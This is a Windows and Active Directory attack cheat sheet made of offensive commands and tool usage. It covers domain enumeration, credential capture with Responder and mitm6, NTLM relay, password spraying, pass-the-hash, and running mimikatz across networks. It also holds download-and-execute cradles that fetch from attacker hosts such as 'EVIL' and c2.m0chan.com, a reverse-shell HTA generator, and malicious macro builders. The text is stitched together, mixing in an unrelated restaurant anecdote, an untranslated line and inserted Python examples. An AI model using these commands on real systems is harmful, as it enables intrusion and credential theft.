Hacking Windows Cheat Sheet


Some notes/tricks for Windows systems.
Before that I have to say Haidilao's service really is good! I remember going to Haidilao last week; when it came time to pay my Alipay had no money, and it was the waiter who helped call the police...
These notes are mostly based on other articles, cheat sheets, wikis and so on; I just want to collect the best notes here. A lot of it does not need translating, most of it is just collections of tools, and if you are handed the tools and still can't use them, that's your own problem.
net users
net users /domain
net localgroup
net groups /domain
net groups /domain "Domain Admins"
Get-ADUser
Get-Domain
Get-DomainUser
Get-DomainGroup
Get-DomainGroupMember -identity "Domain Admins" -Domain m0chanAD.local -DomainController 10.10.14.10
Find-DomainShare
## Host Discovery
netdiscover -r subnet/24
nbtscan -r [range]
for /L %i in (1,1,255) do @ping.exe -n 1 -w 50 <10.10.10>.%i | findstr TTL
## Reverse DNS Lookup
$ComputerIPAddress = "10.10.14.14"
[System.Net.Dns]::GetHostEntry($ComputerIPAddress).HostName

Get-DomainUser -SPN
Get-ADComputer -Filter {ServicePrincipalName -like "*<keyword>*"} -Properties OperatingSystem,OperatingSystemVersion,OperatingSystemServicePack,PasswordLastSet,LastLogonDate,ServicePrincipalName,TrustedForDelegation,TrustedtoAuthForDelegation
nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'
#https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts
LDAPUtility.cs
Usage: ldaputility.exe options domain [arguments]
ldaputility.exe DumpAllUsers m0chan
ldaputility.exe DumpUser m0chan mr.un1k0d3r
ldaputility.exe DumpUsersEmail m0chan
ldaputility.exe DumpAllComputers m0chan
ldaputility.exe DumpComputer m0chan DC01
ldaputility.exe DumpAllGroups m0chan
ldaputility.exe DumpGroup m0chan "Domain Admins"
ldaputility.exe DumpPasswordPolicy m0chan
Also WMIUtility.cs for WMI Calls & LDAPQuery.cs for Raw LDAP Queries.
See github linked above for full details.




nltest /DCLIST:DomainName
nltest /DCNAME:DomainName
nltest /DSGETDC:DomainName
# Get the current domain
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
# Get the trust relationships of the current domain
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
# View the trust relationships of a specific forest
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()
# View domain trust info from cmd
nltest [/server:<fqdn_foreign_domain>] /domain_trusts /all_trusts /v
nltest /dsgetfti:<domain>
nltest /server:<ip_dc> /domain_trusts /all_trusts
# List all domain controllers
nltest /dclist:offense.local
net group "domain controllers" /domain
# View DC for Current Session
nltest /dsgetdc:m0chanAD.local
# View Domain Trusts from CMD
nltest /domain_trusts
# View User Info from CMD
nltest /user:"m0chan"
# View cached Kerberos tickets
klist
# Get all logged on sessions, includes NTLM & Kerberos
klist sessions
# View the cached TGT
klist tgt
# Old-school whoami: prints USERNAME, USERDOMAIN and USERPROFILE from the environment
set u
# List all usernames
([adsisearcher]"(&(objectClass=User)(samaccountname=*))").FindAll().Properties.samaccountname
# List admins (adminCount=1 marks accounts that are, or once were, members of protected groups)
([adsisearcher]"(&(objectClass=User)(admincount=1))").FindAll().Properties.samaccountname
# Look up a specific account
([adsisearcher]"(&(objectClass=User)(samaccountname=<username>))").FindAll().Properties
# Dump the description attribute of every group (swap in objectClass=User for user descriptions; descriptions often contain passwords or hints)
([adsisearcher]"(&(objectClass=group)(samaccountname=*))").FindAll().Properties | % { Write-Host $_.samaccountname : $_.description }
#https://github.com/jasonwbarnett/linux-adtool
tar zxvf adtools-1.x.tar.gz
cd adtools-1.x
./configure
make
make install
> adtool list ou=user,dc=example,dc=com
CN=allusers,OU=user,DC=example,DC=com
OU=finance,OU=user,DC=example,DC=com
OU=administration,OU=user,DC=example,DC=com
> adtool oucreate marketing ou=user,dc=example,dc=com
> adtool useradd jsmith ou=marketing,ou=user,dc=example,dc=com
> adtool setpass jsmith banana
> adtool unlock jsmith
> adtool groupadd allusers jsmith
> adtool attributereplace jsmith telephonenumber 123
> adtool attributereplace jsmith mail [email protected]
#https://github.com/tevora-threat/SharpView
Get-DomainFileServer
Get-DomainGPOUserLocalGroupMapping
Find-GPOLocation
Get-DomainGPOComputerLocalGroupMapping
Find-GPOComputerAdmin
Get-DomainObjectAcl
Get-ObjectAcl
Add-DomainObjectAcl
Add-ObjectAcl
Remove-DomainObjectAcl
Get-RegLoggedOn
Get-LoggedOnLocal
Get-NetRDPSession
Test-AdminAccess
Invoke-CheckLocalAdminAccess
Get-WMIProcess
Get-NetProcess
Get-WMIRegProxy
Get-Proxy
Get-WMIRegLastLoggedOn
Get-LastLoggedOn
Get-WMIRegCachedRDPConnection
Get-CachedRDPConnection
Get-WMIRegMountedDrive
Get-RegistryMountedDrive
Find-InterestingDomainAcl
Invoke-ACLScanner
Get-NetShare
Get-NetLoggedon
nmap -p 139,445 --script "smb-enum-*" <target>
enum4linux 1.3.3.7
smbmap -H 1.3.3.7
smbclient -L \\INSERTIPADDRESS
smbclient -L INSERTIPADDRESS
smbclient //INSERTIPADDRESS/tmp
smbclient \\\\INSERTIPADDRESS\\ipc$ -U john
smbclient //INSERTIPADDRESS/ipc$ -U john
smbclient //INSERTIPADDRESS/admin$ -U john
nbtscan [SUBNET]
#Check for SMB Signing
nmap --script smb-security-mode.nse -p 445 10.10.14.14
snmpwalk -c public -v1 10.10.14.14
snmpcheck -t 10.10.14.14 -c public
onesixtyone -c names -i hosts
nmap -sT -p 161 10.10.14.14 -oG snmp_results.txt
snmpenum -t 10.10.14.14
nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122
dig axfr blah.com @ns1.m0chan.com
nslookup -> set type=any -> ls -d m0chan.com
dnsrecon -d m0chan.com -D /usr/share/wordlists/dnsmap.txt -t std,brt --xml output.xml
ldapsearch -H ldap://<ip>
ldapwhoami
rpcclient -U "" -N 10.10.14.14
srvinfo
enumdomusers
enumalsgroups domain
lookupnames administrators
querydominfo
enumdomusers
queryuser <user>
lsaquery
lookupnames Guest
lookupnames Administrator
rdesktop -u guest -p guest INSERTIPADDRESS -g 94%
# Brute force
ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS
hydra
medusa
and so on
On the m0chan (attacker) machine:
mkdir tftp
atftpd --daemon --port 69 tftp
cp *file* tftp
On the victim machine:
tftp -i <[IP]> GET <[FILE]>
echo open <[IP]> 21 > ftp.txt
echo USER demo >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs <url> <out_file>
Use echoup function on pentest.ws to generate echo commands.
https://pentest.ws/features
#https://github.com/danielbohannon/Invoke-CradleCrafter Use this to craft obsufacted cradles
Invoke-WebRequest "https://server/filename" -OutFile "C:\Windows\Temp\filename"
(New-Object System.Net.WebClient).DownloadFile("https://server/filename", "C:\Windows\Temp\filename")
#Powershell Download to Memory
IEX(New-Object Net.WebClient).downloadString('http://server/script.ps1')
#Powershell with Proxy
$browser = New-Object System.Net.WebClient;
$browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
IEX($browser.DownloadString('https://server/script.ps1'));
$fileName = "Passwords.kdbx"
# Read the raw bytes: Get-Content would decode the binary .kdbx as text and corrupt it
$fileContentBytes = [System.IO.File]::ReadAllBytes((Resolve-Path $fileName).Path)
$fileContentEncoded = [System.Convert]::ToBase64String($fileContentBytes)
$fileContentEncoded | Set-Content ($fileName + ".b64")
# Decode on the receiving side with: base64 -d Passwords.kdbx.b64 > Passwords.kdbx
pscp.exe C:\Users\Public\m0chan.txt [email protected]:/tmp/m0chan.txt
pscp.exe [email protected]:/home/user/m0chan.txt C:\Users\Public\m0chan.txt
cmd.exe /c "bitsadmin.exe /transfer downld_job /download /priority high http://c2.m0chan.com/mimikatz.exe C:\Temp\mimikatz.exe & start C:\Temp\mimikatz.exe"
rdesktop 10.10.10.10 -r disk:linux='/home/user/filetransferout'
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
#File Transfer
certutil.exe -urlcache -split -f https://m0chan:8888/filename outputfilename
certutil.exe -encode inputFileName encodedOutputFileName
certutil.exe -decode encodedInputFileName decodedOutputFileName
curl http://server/file -o file
curl http://server/file.bat | cmd
IEX(curl http://server/script.ps1);Invoke-xxx
python smbserver.py Share `pwd` -u m0chan -p m0chan --smb-2support
Exploit
git clone https://github.com/SpiderLabs/Responder.git
python Responder.py -i local-ip -I eth0


responder -I eth0 -w
# Use when the WPAD attack does not work; mitm6 uses IPv6 and DNS to relay credentials to the target.
# IPv6 is enabled by default on Windows, which is why this works.
git clone https://github.com/fox-it/mitm6.git
cd mitm6
pip install .
mitm6 -d m0chanAD.local
ntlmrelayx.py -wh webserverhostingwpad:80 -t smb://TARGETIP/ -i
-i opens an interactive shell
Shout out to hausec for this super nice tip.
Create a .scf file, drop it in an SMB share and start Responder :)
Filename = @m0chan.scf
[Shell]
Command=2
IconFile=\\10.10.14.2\Share\test.ico
[Taskbar]
Command=ToggleDesktop
Differences between NTLM, Net-NTLMv1 and Net-NTLMv2:
https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
https://payloads.online/archivers/2018-11-30/1#chalengeresponse
PS: You CANNOT relay a hash back to the host it came from (fixed in MS08-068).
PS: SMB signing must not be required on the target for this to work; domain controllers require it by default, workstations and member servers only have it enabled. Check with an nmap scan or crackmapexec:
crackmapexec smb 10.10.14.0/24 --gen-relay-list targets.txt
This gives you the list of hosts in the subnet that do not require SMB signing.
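The check the crackmapexec line above performs, written out as an added example (this is not code from the page or from CrackMapExec): it reads the SecurityMode field of an SMB1 or SMB2 NEGOTIATE response and keeps only the hosts where signing is not required. The three responses are constructed fixtures built by the helper functions, not captures, and the IP addresses are placeholders.

```python
import struct

# SMB2 NEGOTIATE response SecurityMode bits (MS-SMB2 2.2.4)
SMB2_SIGNING_ENABLED = 0x0001
SMB2_SIGNING_REQUIRED = 0x0002
# SMB1 NEGOTIATE response SecurityMode bits for the NT LM 0.12 dialect (MS-CIFS 2.2.4.52.2)
SMB1_SIGNING_ENABLED = 0x04
SMB1_SIGNING_REQUIRED = 0x08


def signing_state(packet: bytes):
    """Return (signing_enabled, signing_required) from a NEGOTIATE response."""
    if packet[:4] == b"\xfeSMB":
        command, = struct.unpack_from("<H", packet, 12)                 # 0 = NEGOTIATE
        structure_size, mode = struct.unpack_from("<HH", packet, 64)   # body follows the 64-byte header
        if command != 0 or structure_size != 65:
            raise ValueError("not an SMB2 NEGOTIATE response")
        return bool(mode & SMB2_SIGNING_ENABLED), bool(mode & SMB2_SIGNING_REQUIRED)
    if packet[:4] == b"\xffSMB":
        # 32-byte SMB1 header; command 0x72 = SMB_COM_NEGOTIATE; WordCount 17 for NT LM 0.12;
        # parameter words start with DialectIndex (2 bytes) followed by SecurityMode (1 byte)
        if packet[4] != 0x72 or packet[32] != 17:
            raise ValueError("not an NT LM 0.12 SMB1 NEGOTIATE response")
        mode = packet[35]
        return bool(mode & SMB1_SIGNING_ENABLED), bool(mode & SMB1_SIGNING_REQUIRED)
    raise ValueError("not an SMB packet")


def relay_targets(responses: dict) -> list:
    """Hosts that do not *require* signing. 'Enabled' alone does not stop a relay:
    the relayed client never asks for signing, so the server falls back to unsigned."""
    return [host for host, pkt in responses.items() if not signing_state(pkt)[1]]


def build_smb2_negotiate_response(security_mode: int) -> bytes:
    """Constructed minimal SMB2 NEGOTIATE response (test fixture, not a capture)."""
    header = (b"\xfeSMB"
              # StructureSize, CreditCharge, Status, Command, CreditResponse, Flags(SERVER_TO_REDIR),
              # NextCommand, MessageId, Reserved, TreeId, SessionId
              + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0)
              + b"\x00" * 16)                                           # Signature
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, 0x0311, 0, b"\x00" * 16,
                       0, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0) + b"\x00"
    return header + body


def build_smb1_negotiate_response(security_mode: int) -> bytes:
    """Constructed minimal SMB1 NT LM 0.12 NEGOTIATE response (test fixture, not a capture)."""
    header = b"\xffSMB" + bytes([0x72]) + b"\x00" * 27
    words = bytes([17]) + struct.pack("<H", 0) + bytes([security_mode]) + b"\x00" * 31
    return header + words + struct.pack("<H", 0)                       # ByteCount = 0


# Constructed sample: what three hosts would answer (placeholder addresses).
SAMPLE_RESPONSES = {
    "10.10.14.10": build_smb2_negotiate_response(SMB2_SIGNING_ENABLED | SMB2_SIGNING_REQUIRED),  # DC
    "10.10.14.21": build_smb2_negotiate_response(SMB2_SIGNING_ENABLED),  # workstation default
    "10.10.14.22": build_smb1_negotiate_response(SMB1_SIGNING_ENABLED),  # legacy SMB1-only box
}

if __name__ == "__main__":
    for host in relay_targets(SAMPLE_RESPONSES):
        print(host)
```

The output is the same kind of list `--gen-relay-list` writes to targets.txt; a host that answers "enabled, not required" is still a valid relay target, which is why the workstation above is listed and the DC is not.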
python Responder.py -I <interface> -r -d -w
ntlmrelayx.py -tf targets.txt (By default this will dump the local SAM of the targets, not very useful?)
我们如何执行命令呢?
ntlmrelayx.py -tf targets.txt -c powershell.exe -Enc asdasdasdasd
ntlmrelayx.py -tf targets.txt -c powershell.exe /c download and execute beacon... = RIP
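What actually travels through Responder and ntlmrelayx in the steps above is the Net-NTLMv2 challenge-response, not the NT hash. The following added example (not code from the page, Responder or impacket) computes both from a password, using the MS-NLMP section 4.2.4 test vector (user "User", domain "Domain", password "Password", server challenge 0123456789abcdef, client challenge aa*8, timestamp 0) so the values can be checked against the spec. It shows why a captured Net-NTLMv2 blob can be cracked with hashcat -m 5600 or relayed in the moment but cannot be replayed as pass-the-hash, while the NT hash can. MD4 is implemented inline because OpenSSL 3 builds of Python often refuse hashlib.new('md4').

```python
import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), needed for the NT hash."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r3_order = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1
            a = rotl((a + f(b, c, d) + x[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = rotl((a + g(b, c, d) + x[(i % 4) * 4 + i // 4] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = rotl((a + h(b, c, d) + x[r3_order[i]] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NTOWFv1 = MD4(UTF-16LE(password)). This is the value pass-the-hash replays."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """MS-NLMP 3.3.2: HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def av_pairs(netbios_domain: str, netbios_server: str) -> bytes:
    """Minimal TargetInfo: MsvAvNbDomainName, MsvAvNbComputerName, MsvAvEOL."""
    def pair(av_id, value):
        v = value.encode("utf-16-le")
        return struct.pack("<HH", av_id, len(v)) + v
    return pair(0x0002, netbios_domain) + pair(0x0001, netbios_server) + struct.pack("<HH", 0, 0)


def ntlmv2_response(password, user, domain, server_challenge, client_challenge, timestamp, target_info):
    """MS-NLMP 3.3.2 NTLMv2 response: returns (NTProofStr, temp); the wire value is NTProofStr + temp.
    The server challenge is fresh per authentication, so the result is only useful once (relay)
    or offline (cracking); it cannot be replayed like the NT hash."""
    temp = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)
    nt_proof = hmac.new(ntowf_v2(password, user, domain), server_challenge + temp, hashlib.md5).digest()
    return nt_proof, temp


def hashcat_netntlmv2(user, domain, server_challenge, nt_proof, temp) -> str:
    """The line Responder logs and hashcat -m 5600 cracks: user::domain:challenge:NTProofStr:blob."""
    return f"{user}::{domain}:{server_challenge.hex()}:{nt_proof.hex()}:{temp.hex()}"


# MS-NLMP section 4.2.4 test vector inputs
MSNLMP_SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
MSNLMP_CLIENT_CHALLENGE = b"\xaa" * 8


def demo() -> str:
    proof, temp = ntlmv2_response("Password", "User", "Domain", MSNLMP_SERVER_CHALLENGE,
                                  MSNLMP_CLIENT_CHALLENGE, 0, av_pairs("Domain", "Server"))
    return hashcat_netntlmv2("User", "Domain", MSNLMP_SERVER_CHALLENGE, proof, temp)


if __name__ == "__main__":
    print("NT hash :", nt_hash("Password").hex())
    print("NTOWFv2 :", ntowf_v2("Password", "User", "Domain").hex())
    print("hashcat :", demo())
```

Feeding the printed hashcat line to `hashcat -m 5600` with "Password" in the wordlist recovers it, which is the whole cracking path; the NT hash printed on the first line is what `crackmapexec ... -H` and mimikatz pass around instead.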
#https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/
Combine privxchange.py and ntlmrelayx
ntlmrelayx.py -t ldap://DOMAINCONTROLLER.m0chanAD.local --escalate-user TARGETUSERTOESCALATE
python privexchange.py -ah FQDN.m0chanAD.local DOMAINCONTROLLER.m0chanAD.local -u TARGETUSERTOESCALATE -d m0chanAD.local
#https://github.com/dafthack/MailSniper.git
Invoke-PasswordSprayOWA -ExchHostname EXCH2012.m0chanAD.local -UserList .\users.txt -Password Winter2019
#https://github.com/sensepost/ruler
./ruler-linux64 -domain m0chanAD.local --insecure brute --userpass userpass.txt -v
#https://github.com/quickbreach/ExchangeRelayX
An NTLM relay tool to the EWS endpoint for on-premise exchange servers. Provides an OWA for hackers.
./exchangeRelayx.py -t https://mail.quickbreach.com
#https://github.com/dafthack/MailSniper.git
Enumerate GlobalAddressList
Get-GlobalAddressList -ExchHostname EXCH2012.m0chanAD.local -Username [email protected] -Password Winter2019
Enumerate AD Usernames
Get-ADUsernameFromEWS -Emaillist .\users.txt
Enumerate Mailbox Folders
Get-MailboxFolders -Mailbox [email protected]
Enumerate Passwords & Credentials Stored in Emails
Invoke-SelfSearch -Mailbox [email protected]
Enumerate Passwords & Credentials (Any Users) Requires DA or Exchange Admin
Invoke-GlobalMailSearch -ImpersonationAccount helenHR -ExchHostname Exch2012
CrackMapExec is installed on Kali, or get the Windows binary from GitHub.
Has 3 execution methods, selected with --exec-method:
smbexec <- Creates and runs a service over SMB
wmiexec <- Executes the command over WMI
atexec <- Schedules a task with Task Scheduler
Can execute plain commands with -x (cmd.exe) or -X (PowerShell), e.g.
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' -x whoami
crackmapexec smb 10.10.14.0/24 <- Host Discovery
crackmapexec smb 10.10.14.0/24 -u user -p 'Password'
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --pass-pol
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --shares
Can also PTH with CME
crackmapexec smb 10.10.14.0/24 -u user -H e8bcd502fbbdcd9379305dca15f4854e
cme smb 10.8.14.14 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:e8bcd502fbbdcd9379305dca15f4854e --local-auth --shares
--local-auth authenticates as a local account instead of a domain account; good if the organisation reuses the same local admin hash across the network and is not using LAPS
Dump Local SAM hashes
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth --sam
Running Mimikatz
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz
^ Very noisy but yes you can run mimikatz across a WHOLE network range. RIP Domain Admin
Enum AV Products
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M enum_avproducts
Invoke-PasswordSprayOWA -ExchHostname m0chanAD.local -userlist harvestedUsers.txt -password Summer2019
[*] Now spraying the OWA portal at https://m0chanAD.local/owa/
[*] SUCCESS! User:m0chan:Summer2019
#https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
#https://github.com/NetSPI/PowerUpSQL
#View SQL Instances
Get-SQLInstanceDomain [| Get-SQLServerInfo]
#Login in with Domain Account
Get-SQLConnectionTestThreaded
#Login in with Default Password
Get-SQLServerDefaultLoginPw
#List DB, Tables & Columns
Get-SQLInstanceDomain | Get-SQLDatabase
Get-SQLInstanceDomain | Get-SQLTable -DatabaseName <DB_name>
Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName <DB_name> -TableName <Table_name>
#Search Column Names for Word
Get-SQLInstanceDomain | Get-SQLColumnSampleData -Keywords "<word1,word2>" -Verbose -SampleSize 10
#Try to Execute Commands (RCE)
Invoke-SQLOSCmd
#Enable XP_CMDShell Process
EXEC sp_configure 'show advanced options', 1;
go
RECONFIGURE;
go
EXEC sp_configure 'xp_cmdshell', 1;
go
RECONFIGURE;
go
xp_cmdshell '<cmd>'
go
#https://github.com/infosecn1nja/MaliciousMacroMSBuild
#https://lolbas-project.github.io/lolbas/Binaries/Msbuild/ - MSBuild Explained
Creation of a Shellcode MSBuild VBA Macro
python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba
Creation of a PowerShell MSBuild VBA Macro
python m3-gen.py -p powershell -i /path/payload.ps1 -o output.vba
Creation of a Custom MSBuild VBA Macro
python m3-gen.py -p custom -i /path/msbuild.xml -o output.vba
Creation of a Shellcode MSBuild VBA Macro With Kill Date
python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba -k 20/03/2018
Creation of a Shellcode MSBuild VBA Macro With Environmental Keying
python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba -d yourdomain
python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba -d yourdomain, microsoft, github
#https://github.com/felamos/weirdhta
python3 weirdhta.py --help
python3 weirdhta.py 10.10.10.10 4444 --normal (for normal powershell reverse_shell)
python3 weirdhta.py 10.10.10.10 4444 --smb (without powershell payload, it will use smb)
python3 weirdhta.py 10.10.10.10 4444 --powercat (for powercat)
python3 weirdhta.py 10.10.10.10 4444 --command 'c:\windows\system32\cmd.exe' (custom command)
Ultimate Shell for WinRM Connections
Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ]
-S, --ssl Enable SSL
-c, --pub-key PUBLIC_KEY_PATH Local path to public key certificate
-k, --priv-key PRIVATE_KEY_PATH Local path to private key certificate
-s, --scripts PS_SCRIPTS_PATH Powershell scripts local path
-e, --executables EXES_PATH C# executables local path
-i, --ip IP Remote host IP or hostname (required)
-U, --url URL Remote url endpoint (default /wsman)
-u, --user USER Username (required)
-p, --password PASS Password
-P, --port PORT Remote host port (default 5985)
-V, --version Show version
-h, --help Display this help message
#https://github.com/gpoguy/GetVulnerableGPO
PowerShell script to find 'vulnerable' security-related GPOs that should be hardened (for more background, see the GPO discoverability section of this blog: https://sdmsoftware.com/group-policy-blog/security-related/security-fun-bloodhound-ms16-072-gpo-discoverability/) Requires GPMC & SDM Software GPMC PowerShell Module (used to more easily parse GP settings during the search): https://s3.amazonaws.com/sdmsoftware.com/dl/SDM-GPMC-Module2.0Setup.zip
#https://github.com/peewpw/Invoke-PSImage
Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to execute
Invoke-PSImage takes a PowerShell script and encodes the bytes of the script into the pixels of a PNG image. It generates a oneliner for executing either from a file or from the web.
PS>Import-Module .\Invoke-PSImage.ps1
PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\evil-kiwi.png -Image .\kiwi.jpg
[Oneliner to execute from a file]
PS>Import-Module .\Invoke-PSImage.ps1
PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\evil-kiwi.png -Image .\kiwi.jpg -WebRequest
[Oneliner to execute from the web]
Does not get past Huorong (a Chinese AV).
#https://iwantmore.pizza/posts/meterpreter-shellcode-inject.html
A module for executing arbitrary shellcode within Meterpreter aka executing Mimikatz in-memory, reflectively and interactively!
donut -f /tmp/mimikatz.exe -a 2 -o /tmp/payload.bin
use post/windows/manage/shellcode_inject
set SHELLCODE /tmp/payload.bin
set SESSION 1
run
systeminfo
wmic qfe
net users
hostname
whoami
net localgroup
echo %logonserver%
netsh firewall show state
netsh firewall show config
netstat -an
type C:\Windows\system32\drivers\etc\hosts
powershell.exe /c IEX(New-Object Net.WebClient).downloadString('webserver/PowerUp.ps1') ;Invoke-AllChecks
#https://github.com/GhostPack/SharpUp
C Sharp Implementation of PowerUp.ps1 which can be reflectively loaded.
If It’s AD Get Bloodhound Imported…
SharpHound.exe -> https://github.com/BloodHoundAD/SharpHound
IEX(New-Object Net.WebClient).DownloadString('http://webserver:4444/SharpHound.ps1')
Invoke-BloodHound -CollectionMethod All
Import .zip to Bloodhound
If you can't exfil the .zip... Find a way ;) I joke, I joke. Output as plain json and copy over manually. It's a big big pain but it works.
git clone https://github.com/fox-it/BloodHound.py.git
cd BloodHound.py/ && pip install .
bloodhound-python -d m0chanAD.local -u m0chan -p Summer2019 -gc DOMAINCONTROLLER.m0chanAD.local -c all
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
# SNMP Parameters
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
tasklist /SVC
net start
reg query HKEY_LOCAL_MACHINE\SOFTWARE
DRIVERQUERY
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
Full Permissions for 'Everyone' on Program Folders
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
Modify Permissions for Everyone on Program Folders
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
